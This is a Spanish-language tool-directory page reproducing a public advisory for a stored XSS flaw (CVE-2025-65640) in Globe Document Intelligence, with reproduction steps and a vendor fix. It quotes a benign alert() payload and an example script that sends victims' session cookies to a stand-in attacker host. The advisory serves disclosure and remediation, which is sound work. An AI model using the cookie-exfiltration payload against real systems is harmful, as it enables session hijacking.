Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-65640 — Aviso público para CVE-2025-65640: Vulnerabilidad de XSS almacenado en Globe Document Intelligence. | Kitploit
Herramientas/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

Aviso público para CVE-2025-65640: Vulnerabilidad de XSS almacenado en Globe Document Intelligence.

Ver Repositorio
10hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-65640

1. Información de Vulnerabilidad

  • CVE ID: CVE-2025-65640 (Actualmente RESERVADO)
  • Tipo de Vulnerabilidad: Stored Cross-Site Scripting (XSS)
  • Puntuación CVSSv3: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • Vendedor: Arket/Bluenext S.r.l.
  • Producto: Globe Document Intelligence
  • Versión Afectada: 5.0.0.559
  • Descubridor: Vincenzo Emanuele Martone

2. Descripción

Se identificó una vulnerabilidad de Stored Cross-Site Scripting (XSS) en la plataforma Globe Document Intelligence (versión 5.0.0.559). La aplicación no sanitiza ni codifica adecuadamente la entrada proporcionada por el usuario en la propiedad "Title" de un documento recién creado. Cuando un usuario autenticado navega a las páginas de resumen (por ejemplo, "Task in progress / Recent"), la carga maliciosa se refleja y ejecuta en el contexto del navegador de la víctima.

3. Impacto

Esta vulnerabilidad permite a un atacante autenticado almacenar código JavaScript malicioso en el servidor. Cuando otros usuarios autenticados (incluyendo cuentas administrativas) visualizan las páginas afectadas, el script se ejecuta automáticamente. Si bien la Prueba de Concepto a continuación demuestra la vulnerabilidad usando un alert() benigno, un atacante puede explotar esta falla para lograr el Secuestro de Sesión y la Toma de Control de la Cuenta. Por ejemplo, inyectar una carga útil como <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> exfiltraría silenciosamente las cookies de sesión de la víctima a un servidor externo controlado por el atacante.

4. Pasos para Reproducir (Prueba de Concepto)

Para reproducir la vulnerabilidad, un atacante autenticado puede seguir estos pasos:

  1. Navegue a la sección de creación de documentos ("Nuovo documento") y complete los campos requeridos con datos arbitrarios para crear un nuevo documento exitosamente.
  2. Envíe el formulario y cree el documento.
  3. Seleccione el documento recién creado, abra el menú contextual (Clic derecho -> Propiedades del documento) y localice el campo "Title".
  4. Inyecte la siguiente carga útil XSS básica en el campo "Title": <script>alert("XSS")</script>
  5. Guarde los cambios. La carga útil maliciosa ahora está almacenada persistentemente en la base de datos.
  6. Navegue a la página "Task in progress / Recent" (Task in attesa/Recenti).
  7. Dado que la página renderiza el título del documento sin una codificación de salida adecuada, la carga útil de JavaScript se ejecuta, desencadenando la alerta.

5. Mitigación Recomendada

Según el vendedor, esta vulnerabilidad ha sido solucionada en la versión 5.1.0.575. Para remediar este problema, se recomienda actualizar la plataforma Globe Document Intelligence a la versión 5.1.0.575.


Aviso de Exención de Responsabilidad

Esta Prueba de Concepto (PoC) se proporciona exclusivamente con fines educativos y de investigación. La información y el código detallados en este documento no deben ser utilizados para actividades maliciosas ni contra ningún sistema sin la autorización explícita y previa de los propietarios del sistema. El autor no asume ninguna responsabilidad y no se hace responsable por cualquier mal uso o daño causado por la aplicación del material proporcionado.

Descargar herramienta